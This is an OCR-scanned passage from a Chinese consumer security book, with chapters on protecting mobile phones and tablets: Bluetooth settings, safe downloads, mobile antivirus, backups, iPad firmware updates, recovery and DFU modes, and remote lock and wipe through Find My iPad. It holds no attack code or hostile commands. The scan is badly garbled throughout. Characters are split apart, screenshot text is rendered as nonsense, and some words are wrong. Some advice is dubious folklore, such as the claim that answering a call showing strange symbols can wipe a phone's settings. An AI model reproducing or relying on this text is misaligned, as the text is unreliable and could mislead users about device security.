具有 蓝牙 功能 的 手机 与 外 界 〈 包 括 手 
机 之 间 、 手 机 与 电脑 之 间 ) 虽然 传输 数据 
非常 便捷 ， 但 是 对 于 自己 不 明白 的 信息 来 
源 ， 最 好 不 要 打开 ， 以 免 手 机 遭 到 攻击 。 
针对 这 种 情况 ， 建 议 拥有 蓝牙 功能 的 手机 
用 户 注意 以 下 事项 。 


1. 不 使 用 时 ， 要 关闭 


如 果 希 望 保护 具有 蓝牙 功能 的 手机 安 
全 ， 一 个 首要 的 原则 是 在 不 需要 使 用 蓝牙 
的 时 候 将 其 关闭 。 对 于 移动 电话 来 说 ， 可 
以 在 蓝牙 设置 界面 中 将 蓝牙 关闭 ， 而 对 于 
计算 机 上 的 蓝牙 适配器 ， 则 可 以 通过 附带 
的 工具 软件 或 操作 系统 本 身 的 蓝牙 软件 将 
其 设置 为 不 可 连接 状态 。 


2. 设置 蓝牙 的 安全 功能 模式 ， 可 见 模 
式 存在 安全 隐患 


使 用 一 些 探寻 蓝牙 设备 的 工具 ， 可 以 
发 现 周围 处 于 不 可 见 状态 的 蓝牙 设备 。 蓝 
牙 设备 可 以 设置 可 见 、 不 可 见 、 有 限 可 见 3 
种 模式 ， 这 些 模式 决定 了 该 蓝牙 设备 在 何 
种 情况 下 可 被 其 他 蓝牙 设备 发 现 。 

事实 上 ， 将 蓝牙 设备 设置 为 不 可 见 并 不 
会 对 验证 受信 任 设备 造成 影响 ， 而 且 可 以 减 
少 不 必 要 的 安全 威胁 。 尽 管 将 蓝牙 设备 设置 
为 不 可 见 仍然 有 可 能 被 发 现 ， 但 是 攻击 者 必 
须 进 行 强度 高 得 多 的 扫描 ， 相 对 来 说 设置 为 
不 可 见 的 蓝牙 设备 是 较 难 被 攻击 的 。 


3. 使 用 蓝牙 安全 设置 


在 蓝牙 规定 中 定义 了 3 种 安全 模式 : 没 
有 任何 保护 的 无 安全 模式 、 通 过 验证 码 保 
护 的 服务 级 安全 、 可 以 应 用 加 密 的 设备 级 
安全 。 在 适用 的 情况 下 尽 可 能 应 用 较 高 的 
安全 模式 。 事 实 上 ， 平 均 每 100 部 蓝牙 手机 
中 有 10% 一 20% 设 置 了 1111 或 1234 这 样 容易 
被 猜 解 的 密码 ， 设 置 了 复杂 密码 的 蓝牙 手 
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机 可 以 在 很 大 程度 上 避免 未 受权 访问 和 一 


些 暴力 破解 类 型 的 攻击 。 

4. 及 时 为 手机 漏洞 打 补 丁 一 一 保持 手 
机 安全 

手机 操作 系统 的 漏洞 是 造成 蓝牙 手机 


安全 问题 的 最 主要 原因 之 一 ， 好 在 大 部 分 
存在 安全 漏洞 的 手机 都 可 以 通过 厂商 提供 
的 更 新 来 获得 解决 ， 所 以 蓝牙 手机 用 户 应 
该 了 解 自己 的 设备 是 否 有 安全 漏洞 并 及 时 
从 厂商 处 获取 更 新 。 另 外 ， 更 多 地 了 解 蓝 
牙 安 全 方面 的 知识 ， 并 应 用 一 些 免费 的 蓝 
牙 安 全 工具 〈 如 Bluekey) 也 可 以 有 效 地 减 
少 受 攻击 的 可 能 。 


12.2.2 ”保证 手机 下 载 应 用 程序 的 安全 性 

随 着 手机 营运 商 大 力 推行 GPRS 功 能 ， 
手机 上 网 已 经 成 了 时 比 的 名 词 ， 手 机 上 网 除 
了 可 以 看 新 闻 外 ， 还 可 以 远程 下 载 游 戏 、 
铃声 及 图 片 等 信息 ， 这 给 某 些 病毒 的 传播 提 
供 了 良好 的 渠道 ， 很 多 木马 病毒 文件 就 隐藏 
在 这 些 资源 中 ， 运 行 游戏 的 同时 会 将 病毒 同 
时 启动 ， 如 “蚊子 木马 ”事件 就 是 一 个 很 好 
的 教训 。 这 就 要 求 用 户 在 使 用 手机 下 载 各 种 
资源 的 时 候 ， 确 保 下 载 站 点 是 否 安全 可 靠 ， 
尽量 避免 去 那些 个 人 网 站 或 一 些 不 知名 的 
WAP 站 点 下 载 。 

总 之 ， 用 手机 上 网 时 ， 尽 量 要 到 各 大 
知名 网 站 上 去 下 载 ， 以 防止 手机 病毒 从 互 
联网 向 手机 传播 ， 因 此 ， 不 要 使 用 那些 私 
人 开发 的 第 三 方 手机 管理 和 应 用 程序 。 另 
外 ， 在 通过 蓝牙 或 红外 线 将 手机 连接 电脑 
之 前 ， 先 用 杀毒 软件 扫描 电脑 中 的 文件 和 
系统 ， 确 保 没 有 中 毒 后 再 进行 数据 传输 。 


12.2.3 ”关闭 乱码 电话 ， 删 除 怪异 短信 


在 手机 的 日 常 使 用 过 程 中 ， 除 了 要 尽 
量 少 从 网 上 下 载 信息 和 关闭 蓝牙 功能 外 ， 
还 要 时 时 当心 黑客 通过 其 他 途径 来 攻击 手 
机 ， 即 随时 注意 检测 手机 的 异常 情况 。 


1. 检测 乱码 电话 

当 对 方 的 电话 拨 入 时 ， 屏 幕 上 显示 的 
一 般 是 来 电 电话 号 码 ， 如 果 显 示 的 是 别 的 
字样 或 奇异 符号 。 遇 到 这 种 情形 时 ， 用 户 
千 万 不 要 应 答 ， 应 立即 把 电话 关闭 。 如 果 
接听 了 该 来 电 ， 就 很 有 可 能 遭受 黑客 的 攻 
击 ， 手 机 内 所 有 设 定 都 很 有 可 能 被 破坏 。 


2. 删除 怪异 短信 


接收 和 发 送 短信 息 是 手机 的 重要 功 
能 之 一 ， 这 也 是 黑客 攻击 手机 最 常用 的 一 
种 方法 ， 通 常 是 通过 短信 发 送 一 些 手 机 病 
毒 。 手 机 用 户 一 旦 接收 到 带 有 病毒 的 短信 
息 ， 阅 读 后 便 可 能 会 出 现 手机 键盘 被 锁 、 
手机 IC 卡 被 破坏 等 严重 后 果 。 

针对 上 述 问题 ， 对 于 陌生 人 发 送 的 短 
言 息 ， 手 机 用 户 不 要 轻易 打开 ， 更 不 要 转 
发 ， 应 及 时 删除 。 而 对 于 那些 不 能 在 本 机 
上 直接 删除 的 顽固 病毒 文件 ， 应 尽快 关闭 
手机 ， 然 后 将 中 毒手 机 中 的 SIM 卡 取出 ， 再 
将 其 装 入 其 他 类 型 或 品牌 的 手机 中 ， 就 可 
以 将 带 有 病毒 的 短信 息 删 除 。 如 果 仍 无 法 
使 用 ， 则 应 尽快 与 手机 服务 商 联系 ， 通 过 
无 线 网 站 对 手机 进行 杀毒 ， 或 通过 手机 的 
IC 接 入 口 或 红外 传输 接口 进行 杀毒 。 


12.2.4 安装 手机 卫士 软件 


除了 上 述 介绍 的 一 些 防 范 措施 外 ， 还 
应 该 在 自己 的 手机 中 安装 手机 版 的 杀毒 软 
件 。 目 前 ， 手 机 的 杀毒 软件 也 比较 完善 ， 
可 以 对 手机 进行 全 盘 杀 毒 、 目 标 杀毒 等 操 
作 ， 还 可 以 对 杀毒 软件 的 病毒 库 进 行 升 级 
和 设置 计划 任务 ， 即 在 指定 的 时 间 进 行 自 
动 的 升级 和 杀毒 。 另 外 ， 利 用 手机 杀毒 软 
件 还 可 以 进行 实时 监控 ， 像 电脑 中 的 防火 
墙 一 样 ， 对 短信 、 彩 信 、WAP 站 点 信息 和 
程序 进行 实时 监控 。 
国内 外 各 大 杀毒 软件 开发 商都 在 开发 
自己 的 手机 版 杀毒 软件 ， 像 《手机 管家 》 
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《360 手 机 卫士 》 等 ， 用 户 可 以 在 网 上 下 载 
或 购买 与 自己 手机 系统 相应 的 软件 。 


EGR DG |Bmpran ws 外 


| - 
~ 


关 
[te 版 | 7.7.0beta 版 


12.2.5 经常 备份 手机 中 的 个 人 资料 


手机 一 旦 遭受 黑客 攻击 ， 手 机 中 的 资 
料 会 全 部 丢失 或 无 法 重新 开机 ， 这 时 就 需 
要 对 手机 进行 “ 格 机 ”操作 ， 将 手机 状态 
恢复 到 出 三 状态 。 因 此 ， 经 常备 份 数据 是 
非常 必要 的 。 
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实战 演练 1 一 一 使 用 手机 交流 工作 问题 坦白 说 曲 
使 用 手机 可 以 在 线 交流 工作 问题 ， 以 和 rs 
手机 QQ 为 例 进行 介绍 ， 具 体 的 操作 步 又 


如 下 。 


录 界 面 。 


名 称 。 


232 


Step 加 下 载 并 安装 “手机 QQ”， 进 入 QQ 登 | 一 


特别 关心 


step 图 输入 账号 和 密码 后 ， 单 击 “ 登 录 ” 按 
钮 登录 QQ。 


好 友 。 群 曼 设备 通讯 录 公众 号 


[ele 


QQ 号 /手机 号 /邮箱 


密码 
[Eee 加 在 空白 框 中 输入 信息 ， 然 后 单 击 “ 发 
送 ” 按 钮 ， 即 可 发 送 消息 。 


恰 录 即 代表 阅读 并 同意 @@ 僚 


(ele 


625948078 


实战 演练 2 一 一 使 用 《手机 管家 》 查 杀 
手机 病毒 

使 用 《手机 管家 》 可 以 查 杀 手机 病 
毒 ， 这 也 是 加 强手 机 安全 的 方式 之 一 。 使 
用 《手机 管家 》 查 杀手 机 病毒 的 具体 操作 
步骤 如 下 。 


司 录 即 代表 鸭 读 并 同意 


[Bs 图 在 进入 好 友 界 面 后 ， 点 击 联系 人 的 [See 在 手机 屏幕 中 使 用 手指 点 按 “ 手 机 管 


家 ”图 标 ， 进 入 手机 管家 工作 界面 。 
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12.4 小 试 身手 


练习 1: 使 用 手机 QQ 传输 文件 


在 移动 设备 和 电脑 中 登录 同一 QQ 幅 
% 号 ， 在 QQ 主 界面 “我 的 设备 ”中 双击 识别 
的 移动 设备 ， 在 打开 的 窗口 中 可 直接 将 广 
件 拖 电 至 窗口 中 ， 以 实现 将 办 公文 件 传输 
到 移动 设备 。 


加 St 须 打开 文件 助 手 


step 图 使 用 手指 点 按 “ 病 毒 查 杀 ”图 标 ， 即 
可 开始 扫描 手机 中 的 病毒 。 


EE Ey 


练习 2: 使 用 手机 邮箱 发 送 办 公文 档 


使 用 手机 、 平 板 电脑 可 以 将 编辑 好 的 荆 
文档 发 送 给 领导 或 好 友 ， 这 里 以 手机 发 送 
PowerPoint 演 示 文 稿 为 例 进行 介绍 ， 有 具体 的 
操作 步骤 如 下 。 

[step 图 演示 文稿 制作 完成 后 ， 单 击 “ 菜 单 ” 
按钮 国 ， 并 单 击 “ 共 享 ”选项 。 


扫描 完成 后 ， 会 给 出 相应 的 查 杀 结果 。 
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step 图 在 打开 的 “共享 ”界面 中 选择 “作为 
附件 共享 ”选项 。 


共享 


您 想 以 何 种 方式 共享 ? 


Ce) 以 链接 形式 共享 


由 作为 附件 共享 


step 图 打开 “作为 附件 共享 ”界面 ， 选 择 
“演示 文稿 ”选项 。 


作为 附件 共享 
要 使 用 哪个 格式 ? 


肯 演示 文稿 


罗 PDF 
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[sep 加 在 打开 的 选择 界面 中 选择 共享 方式 ， 
这 里 选择 “电子 邮件 ”选项 。 


GE ET 


作为 附件 共享 
加 Outlook 
A Me 
国 到 本 
电子 邮件 
国 ta 
司 发 送 给 好 友 


国 发 送 到 我 的 电脑 
面对面 快 传 
( 免 流量 ) 

到 ”发 送 给 朋友 
添加 到 微 信 收藏 


汉 。 分享 给 附近 的 人 


[ss 图 在 “电子 邮件 ”窗口 中 输入 收 件 人 
的 邮箱 地 址 ， 并 输入 邮件 正文 内 容 ， 单 击 
“发 送 ” 按 钮 ， 即 可 将 办 公文 档 以 附件 的 
形式 发 送 给 他 人 。 


我 正在 从 OneDrive - 个 人 与 多 共享 销售 报告.pptk 


全 他 告 ppte G 


MN ie wo = 


第 13 音 ”平板 电脑 的 安全 防护 策略 


如 果 自 己 的 平板 电脑 被 黑客 攻击 或 无 意 中 丢失 ， 那 存储 于 平板 电脑 上 的 个 人 隐私 、 商 
业 机 密 无 疑 会 被 窃取 。 本 章 介绍 平板 电脑 的 安全 防护 策略 ， 主 要 内 容 包括 平板 电脑 的 攻击 


手法 和 平板 电脑 的 防护 策略 等 。 


13.1 平板 电脑 的 攻击 手法 


平板 电脑 是 PC 家 族 新 增加 的 一 名 成 
员 ， 其 外 观 和 笔记 本 电脑 相似 ， 但 不 是 单 
纯 的 笔记 本 电脑 ， 它 可 以 被 称 为 笔记 本 电 
脑 的 浓缩 版 。 因 此 ， 电 脑 存在 的 安全 问 
题 ， 一 般 平板 电脑 也 会 存在 。 


下 面 给 出 平板 电脑 的 安全 问题 ， 如 果 黑 
客 利用 这 些 安 全 漏洞 ， 就 可 能 实施 攻击 了 。 

(1) 系统 漏洞 问题 。 随 着 时 间 的 推 
移 ， 任 何 一 个 系统 都 会 存在 系统 漏洞 ， 那 
么 平板 电脑 也 不 例外 。 

(2) 病毒 攻击 。 由 于 平板 电脑 可 以 与 
电脑 任意 互 传 资料 ， 那 么 电脑 中 的 病毒 也 
会 随 着 这 些 资料 进入 平板 电脑 ， 一 定 在 平 
板 电脑 上 运行 打开 或 运行 这 些 资 料 ， 就 会 
使 平板 电脑 感染 病毒 。 

(3) 平板 电脑 密码 安全 问题 。 平 板 电 
脑 和 电脑 一 样 ， 也 可 以 设置 系统 管理 员 密 
码 ， 那 么 该 密码 就 成 了 黑客 攻击 的 对 象 ， 
从 而 窃取 平板 电脑 中 的 个 人 信息 。 


平板 电脑 的 防护 策略 


常用 的 平板 电脑 防护 策略 主要 有 如 下 
几 种 。 
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13.2.1 自动 升级 iPad 固 件 


iPad 苹 果 设 备 的 固件 在 出 厂 时 就 由 于 芋 男 
果 设 备 中 ， 由 于 固件 不 够 完美 ， 苹 果 公 司 
会 推出 新 的 版 本 固件 ， 这 样 我 们 就 可 以 根 
据 需 要 进行 升级 。 
step 图 使 用 数据 线 将 设备 与 电脑 连接 ， 之 后 
在 计算 机 中 运行 iTunes， 在 左 侧 单 击 链接 的 
设备 图 标 ， 在 “摘要 ”选项 卡 下 单 击 “ 更 
新 ”按钮 。 


EE 下 站 司 
~ 3 ED 
R ED 全 及。 所 和 袜 床 。 营 华 影片。 昌 福 节目 。 Podcast 。 好 甩 。 凤 片 
】 
a = 专著 ;My Fad 
-~ 4 
和 款 件 白术 :432 
Fi op Pe 
入 9 
站 
pm pe aan 
ee ] -本 
HE 人 
am 
pr 
aa0e 


step 图 这 时 将 弹出 iPad 软 件 更 新 提示 信息 
框 ， 提 示 用 户 “ 正 在 联系 iPad 软 件 更 新 服 
务 器 ”。 


正在 联系 pad 软件 更 新 服务 器 
[ CD 


人 提示 :如 果 设 备 中 包含 iTunes 中 未 购买 
的 项 目 ， 则 会 提示 用 户 先进 行 备份 。 


step 图 联系 完成 后 ， 会 弹出 要 求 用 户 进行 更 


iTunes [aa 


© ITunes 会 将 Pad 更 新 到 io5 4.3.3， 并 与 Apple 验证 此 更 新 。 


CC 要 


step 园 单 去 “更 新 ”按钮 ， 弹 出 “iPad 软件 
更 新 ”对 话 框 。 


iPad 软件 更 狐 


重要 信息 
i0s 4.3.3 软件 更 新 


| 本 更 新 对 以 众 包 方式 生成 的 i0s 位 置 数 据 库 的 可 存 进行 了 更 疏 ， 
上 其 中 包 插 : 


| 减少 了 该 灵 存 的 大 小 
| 不 再 桔 如 存 备份 到 Tunes 
| 在 “定位 服务 ”关闭 时 宴席 划 除 这 楼 存 


EN 了 会 导致 iPod 无 法 给 部 分 语言 的 歌曲 正确 排序 的 问 
| 与 本 软件 更 新 幕 容 的 产品 : 


iPhone 4《 GSN 模式 ) 
iphone 305 
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框 ， 提示 用 户 已 恢复 出 厂 值 ， 需 要 重启 
设备 。 


Dilencs 加 


音 的 Pad 已 污 多 各 为 出 三 设置。 正在 委 者 后 动 。 请 售 
Eb 


过冬 甘 息 村 下 < 种 训 石油 夫 。 


Step 图 单 去 “确定 ”按钮 ， 在 iTunes 界 面 
中 显示 设置 iPad， 单 击 “ 设 置 为 新 iPad” 
选项 。 


单 击 “ 下 一 步 ” 按 钮 ， 之 后 询问 用 户 
是 否 同意 软件 更 新 的 许可 协议 。 
iPad 软件 更 新 
安全 信息 : 使 用 之 前 ， 请 阅读 所 有 安全 信息 : 
http://suppert. apple.comjzh_CNjmanuals/#Pad 
软件 许可 协议 
简体 中 文 六 


二 要 事项 ;通过 使 用 iPAD， 阁 下 已 同意 接受 以 下 的 APPLE 和 第 三 方 条 
南 的 约束 


APPLE iFAD 软 件 许可 协议 
来 自 APPLE 的 通知 

6006LE WAPS 条 款 和 条 件 
Y0UTVBE 条 款 和 条 件 


lApple Ine. 
iPAD 软 件 许可 协议 
的 一 售 田 洋 FTE 


CE-$® RR) ev 


Step 图 单 二 “同意 ”按钮 开始 下 载 软件 、 
更 新 软件 、 验 证 软件 及 更 新 iPad 固 件 。 


正在 下 载 1 个 项 目 
iPad 软件 更 新 © 
【ES 


正在 下 载 1 个 项 目 
ipad 软件 更 新 (还 剩 3 分 钟 ) 命 
ey 


Step 加 片 刘 之 后 再 次 弹出 “iTunes” 对 话 
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侈 提示 :选择 “设置 为 新 iPad” 选 项 ， 则 
会 将 iPad 设 置 为 新 的 不 包含 任何 设置 及 内 容 
的 设备 ， 而 选择 “从 以 下 的 备份 恢复 ” 选 
项 ， 可 以 选择 备份 文件 进行 恢复 ， 则 可 以 
将 升级 前 的 一 些 设置 恢复 到 设备 中 。 

[step 图 单 去 “继续 ”按钮 ， 在 打开 的 界面 中 
设置 iPad 界 面 ， 更 改 设备 的 名 称 为 My iPad 
选项 。 


Lt 
Pes 
He 
ees 


侈 提示 :大 家 可 以 根据 需要 更 改 设备 的 名 称 。 


[sep 国 单 去 “完成 ”按钮 ， 更 新 后 会 显示 版 


THD RD EE A 0 


一 一 ， Pad FE 
ee 可 以 中 上 连 巡 。 


各 -ED Ni Be BW WM Paz MS 


人 @ 提 示 : 如 果 之 前 设备 已 经 越 犹 ， 则 固 
件 升 级 后 为 未 越狱 状态 ， 需 要 重新 进行 越 
狱 。 所 以 固件 升级 前 ， 需 要 确认 一 下 要 升 
级 到 的 固件 版 本 是 否 已 经 可 以 完美 越狱 。 


13.2.2 重 装 iPad 系 统 


在 重 装 系统 之 前 ， 可 以 根据 实际 的 需 
求 ， 将 设备 处 于 不 同 的 模式 : 直接 重 装 、 
恢复 模式 和 DFU 模 式 。 


1. 直接 重 装 


将 设备 与 计算 机 连接 后 ， 在 计算 机 中 
打开 iTunes， 可 以 直接 开始 重 装 系统 的 操 
作 。 具 体 的 方法 为 运行 iTunes， 在 左 侧 单 击 
链接 的 设备 图 标 ， 在 “摘要 ”选项 卡 下 单 
击 “ 恢 复 ” 按 钮 。 


@ 移 提示 : 当 设 备 出 现 问题 ， 或 者 越狱 时 便 
出 现 了 连接 USB 画 面 的 提示 ，iTunes 可 以 识 
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别 设备 时 ， 可 采用 单 击 “恢复 ”按钮 的 方 
法 来 恢复 设备 。 


2. 恢复 模式 


进入 恢复 模式 。 具 体 的 方法 为 保持 设 
备 与 计算 机 的 连接 ， 并 打开 iTunes， 同 时 按 
住 iPad 设 备 中 的 Home 键 和 开关 机 / 休 眼 键 ， 
稍 等 片刻 ， 设 备 界面 上 提示 “移动 滑 块 来 
关机 ”， 不 用 理会 ， 继 续 按 住 Home 键 和 
开关 机 /休眠 键 不 松 ， 直至 屏幕 上 出 现 苹果 
的 Logo 时 再 松 开 关机 / 休 眼 键 ， 此 时 继续 按 
Home 键 。 


此 时 观察 iTunes， 当 iTunes 识 别 出 有 需 
要 恢复 的 iPad 时 表示 已 进入 了 恢复 模式 。 


unes 检测 到 一 个 处 于 饶 复 模式 的 iPad。 您 必须 先 用 备份 来 
和 Pad 然后 才能 梅 它 与 Tunes 配合 使 用 。 


侈 提示 :恢复 模式 主要 用 来 升级 和 格式 化 
苹果 设备 ， 如 果 无 法 恢复 则 使 用 DFU 模 式 。 


3. DFU 模 式 


进入 DFU 模 式 。 具 体 的 方法 为 在 计算 
机 中 启动 iTunes， 使 用 数据 线 将 设备 与 计算 
机 连接 ， 然 后 将 关机 。 按 住 “ 开 /关机 ” 键 
和 Home 键 ， 持 续 到 第 10s， 立 即 松 开 “ 开 / 
关机 ” 键 ， 并 继续 按 住 Home 键 ， 这 个 时 候 
iTunes 会 提示 发 现 一 个 恢复 模式 ， 设 备 会 一 
直 保 持 黑屏 状态 。 
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侈 提示 :DEFU 模 式 主要 是 用 于 革 果 设备 固 
件 的 强制 升降 级 操作 。 


中 四 13.2.3 ”为 视频 加 锁 


iPad 中 如 果 存放 了 不 希望 其 他 人 看 到 的 
视频 文件 ， 借 用 《私密 手电 》， 就 可 以 轻松 
实现 为 视频 文件 加 密 的 目的 ， 具 体 的 操作 
步骤 如 下 。 

[step 加 在 iPad 中 下 载 安装 《私密 手电 》 软 
件 ， 使 用 数据 线 将 iPad 与 计算 机 连接 ， 在 
计算 机 中 启动 iTunes， 然 后 选择 识别 的 iPad 
〈 这 里 的 iPad 名 称 为 “ 龙 数 码 ”) 。 

选择 “应 用 程序 ”选项 。 

[step 图 选择 “SecretLight” (私密 手电 ) 
选项 。 

[step 轩 将 一 个 或 多 个 视频 直接 抑 彼 至 
“SecretLight” 程 序 的 文件 列表 。 


sep 图 此 时 即 可 直接 将 所 选 视频 拖 到 iPad 的 
“私密 手电 ”程序 中 。 
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| 诈 ox 


国 ; 十 


step 较 在 iPad 的 主屏 幕 上 单 击 “SecretLight” 


图 标 按钮 。 


step 国 打开 “私密 手电 ”， 按 顺序 单 击 下 方 


不 同 颜色 的 图 标 ， 即 可 实现 密码 的 输入 ， 
默认 密码 是 连续 按 “ 客 ”六 次 。 


[step 图 此 时 即 可 打开 存放 视频 的 文件 夹 ， 在 
界面 底部 单 击 “Password” 按 钮 。 


[ 猫 和 老 怕 MP4 
我 的 家 .MP4 


step 图 在 打开 的 界面 中 按照 不 同 的 顺序 单 击 
下 方 的 图 标 ， 即 可 重新 设置 密码 。 


Setup New Password. 


The password only can make up with 


RGB" pr 


lt means the color in previous view. 


单 击 “完成” 按钮， 完成 修改 视频 广 
件 夹 的 访问 密码 的 操作 ， 再 次 打开 存放 视 
频 的 文件 天 就 需要 重新 输入 新 的 密码 ， 进 
入 后 单 击 要 播放 的 视频 。 


开始 播放 1 


取消 播放 


[Bn] 在 界面 底部 单 击 “ 开 始 播放 ” 按 乌 ， 
即 可 开始 播放 所 选 的 视频 。 
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13.2.4 ”开启 “查找 我 的 Pad” 功 能 

要 想 在 丢失 后 能 够 凭借 MobileMe 的 寻 和 外 
找 功 能 找到 iPad， 需 要 提前 在 iPad 中 安装 软 
件 并 开启 寻找 的 功能 。 


第 1 步 : 安装 “寻找 我 的 Phone” 软 件 
在 iPad 中 下 载 并 安装 “寻找 我 的 iPhone” 


(ipad 版 ) 应 用 程序 。 下 载 地 址 : http://itunes. 
apple.com/cn/app/id376 101648?mt=8。 


Ey 


2 
塞 找 iPhone 


侈 提示 :MobileMe 是 苹果 公司 官方 提供 的 
在 线 同步 服务 ， 包 括 电 子 邮件 、 联 系 人 和 
日 历 的 即时 同步 。 


第 2 步 : 登录 MobileMe 


在 iPad 的 主屏 幕 上 单 击 “设置 ”图 标 
按钮 。 


本 


设置 
[Step 图 在 左 侧 列表 中 单 击 “ 邮 件 、 通 讯 录 、 
日 历 ” 选 项 。 

[Sep 图 单 去 “添加 账户 …” 选 项 。 

[seep 回 单 去 MobileMe 选 项 。 


[1 


本 人大 
PPro | 


~ 一 _ 


step 图 在 弹出 的 登录 框 中 输入 已 有 的 Apple 
ID 和 密码 。 


铭 提 示 : 通 过 已 有 的 Apple ID 或 MobileMe 
电子 邮箱 都 可 以 登录 MobileMe。 


Step 图 单 去 “下 一 步 ” 按 钮 。 


T5 | 按钮， 


在 新 打开 的 界面 中 单 击 
该 按钮 变 成 国 因 ”时 即 可 激活 “查找 我 的 
iPad” 功 能 。 

(seo 在 弹出 的 “查找 我 的 Pad” 对 话 框 中 


提示 是 否 启用 “查找 我 的 iPad” 功 能 ， 单 击 
“允许 ”按钮 同意 启用 该 功能 。 


此 时 即 可 自动 返回 到 “MobileMe” 
界面 ， 单 击 “ 存 储 ” 按 钮 。 


MobileMe 


力 坦 找 我 的 ipad 


允许 此 iPad 在 地 图 上 显示 或 者 被 远程 深 除 
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step 贺 此 时 即 可 自动 返回 到 “邮件 、 通 讯 
录 、 日历” 界面 ， 看 到 已 经 登录 到 MobileMe 
并 且 开 通 “ 查 找 我 的 iPad” 功 能 。 


TT ror 


最 小 字体 大 小 
间作 Ag 本 和 
和 

寺 和 丘 本 人 


地理 


生计 坟 忆 


13.2.5 ”远程 锁定 iPad 


在 iPad 中 开启 了 “查找 我 的 Pad” 功 能 
后 ， 在 计算 机 上 即 可 对 iPad 进 行 远程 定位 和 
锁定 操作 ， 和 避免 iPad 丢 失 后 他 人 随意 操作 
iPad， 窃 取 其 中 的 信息 。 
[step 图 在 计算 机 上 打开 IE 浏览 器 ， 在 地 址 栏 
中 输入 me.com 后 ， 按 键盘 上 的 Enter 键 ， 即 
可 进入 “MobileMe 和 登录 ”界面 。 
输入 Apple ID。 
输入 密码 。 
[step 园 单 击 “ 登 录 ” 按 钮 。 


D WD 
~ BRR totwil BI NAHE 


加 考 天 所， 中 二 
语言 四 看 Wh 并 = 
Din 


给" 国 口 而 ，7 枯 中 ”2 加 IRW 各 ” 


使 用 Apple ID 渤 乔 要 条 


: 


全 EE | 0 

[step 图 打开 “MobileMe 查 找 我 的 Phone” 界 
面 ， 看 到 iPad 的 设备 信息 ， 单 击 “ 龙 数码 
(设备 名 ) ”标签 。 


ET ET 
次 天 :证 癌 下 mix 全 央 ~ 天 gesil 面 要 
居 Nilsh: 要 I iphooc 从" 国 - 口 壹 ”而 岂 - 雪上 昌 ”工具 WW 增 - 


让 


Eee 


mRNA 
\® 


i al 
ED 


step 较 在 弹出 的 对 话 框 中 显示 iPad 的 定位 信 
息 ， 单 击 “ 和 锁定” 按钮 。 


国 龙 数 码 

iPad 

定位 时 间 : 1 分 钟 前 

显示 信息 或 亲 放 声音 … 
镇 定 .… 愉 按 除 .… 
A 
输入 锁定 密码 。 
单 击 “ 下 一 步 ” 按 钮 。 
远程 铁定 
龙 数码 


箱 入 呆 罕 码 。 了 角 更 全 


step 图 重新 输入 密码 。 
step 回 单 击 “锁定 ”按钮 。 


远程 锁定 
龙 数 码 


重新 条 和 至 码 、 
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侈 提 示 : 如 果 iPad 已 经 启用 了 屏幕 锁定 密 
码 ， 此 时 会 直接 弹出 对 话 框 提 示 是 否 使 用 
现 有 密码 ， 单 击 “ 锁 定 ” 按 钮 ， 即 可 使 用 
现 有 密码 锁定 iPad。 


额定 此 设备 ? 
将 用 现 有 密码 领 定 您 的 设备 。 


- | EN 
mt、 


step 加 此 时 iPad 即 可 被 远程 锁定 ， 使 用 者 要 
解 开锁 定 ， 必 须 输入 解锁 密码 。 


实战 演练 
给 丢失 的 iPad 发 信息 。。 
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实战 演练 1 
如 果 由 于 大 意 将 ipad 落 在 某 个 地 方 ， 部 
被 好 心 人 捡 到 ， 你 可 以 远程 给 iPad 发 信息 ， 
通过 这 种 方式 来 联系 捡 到 的 人 ， 从 而 找 
ipad， 具 体 的 操作 步骤 如 下 。 
[sep 回 在 计算 机 中 的 “MobileMe 查 找 我 的 
iPhone ”界面 中 单 击 “显示 信息 或 播放 声 
音 ” 按 钮 。 


加 龙 数码 
iPad 
定位 时 间 : 1 分 名 前 


显示 信息 或 播放 声音 … 


五 


镜 定 .… 控 除 .… 
TAR 
step 图 输入 信息 ， 单 击 “ 发 送 ”按钮 ， 开 始 
联系 捡 到 的 人 。 
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显示 信息 
龙 数码 


你 好 啊 | 


辆 播放 声音 达 2 分 神 。 


[step 图 此 时 iPad 屏 幕 上 会 显示 发 送 的 信息 。 


和 iPad 丢 失 后 ， 远 程 锁定 和 清除 其 中 的 信 
息 ， 虽 然 可 以 防止 iPad 中 的 信息 不 泄露 ， 但 
是 根据 定位 信息 ， 找 到 丢失 的 iPad 才 是 最 重 
要 的 。 

在 计算 机 上 登录 me.com 后 的 这 个 页 面 
已 经 显示 出 了 iPad 的 位 置信 息 ， 只 是 由 于 使 
用 的 是 Google 地 图 ， 所 以 IE 会 显示 不 能 打开 
地 图 。 


Miob: leme 查找 我 的 4Phone -Window lnternet Explorer 
GO Ee "~ TIE 
文件 四 蝙 济 名 ) 查考 他) 收 祖 天 办 工具 骨 匠 如 

次 kgz | 放 四 书生 者 
| 司 mwilLws 查找 我 的 iPhone - 目 -日 可” 耳 四 - 生日 - IO - 号 -“| 


PE 


六 二 于 


242 


= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


可 通过 使 用 还 代理， 来 显示 地 图 。 


ry 


小 试 身 手 


练习 1: 修复 iPad 的 白 苹果 现象 


ipPad 出 现 白 苹果 现象 的 主要 原因 是 : 系 
统 不 稳定 或 者 软件 、 字 体 产 生 冲 突 。 解 决 
这 一 问题 的 具体 操作 步骤 如 下 。 
[sep 贺 使 用 数据 线 连接 计算 机 和 iPad， 并 局 
动 iTunes，iTunes 识 别 iPad 后 ， 先 备份 iPad 
中 所 有 的 资料 。 
本 加 


oA ce 
Eon : 


13.4 


STORE 


step 图 纯 载 所 有 可 疑 的 软件 。 在 印 载 软件 之 
前 一 定 先 关闭 该 软件 。 


I WD SE EE sn RE 


[step 鸭 如 有 果 人 安装 程序 后 ， 就 已 经 开始 白 蔷 
果 ， 则 可 尝试 使 用 WinScp 或 第 三 方 资源 管 
理 软件 访问 iPad， 删 除 之 前 安装 的 软件 文 
件 夹 。 
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练习 2: 远程 清除 iPad 中 的 信息 
iPad 丢 失 后 ， 远 程 清除 iPad 中 的 信息 ， 
可 以 防止 他 人 窃取 私人 信息 。 


step 图 在 计算 机 中 的 “MobileMe 查 找 我 的 
iPhone” 界 面 中 单 击 “ 擦 除 ” 按 钮 。 


龙 数码 

Pad 

定位 时 间 : 1 分 名 前 
旺 示 信息 或 新 放声 音 ..… 


单 击 “ 抹 掉 所 有 数据 ”按钮 ， 即 可 永 
久 地 删除 iPad 上 所 有 媒体 数据 ， 并 恢复 为 出 
厂 设 置 。 


远程 擦 除 
龙 数 码 


抹 掉 此 设备 上 的 所 有 数据 吗 ? 


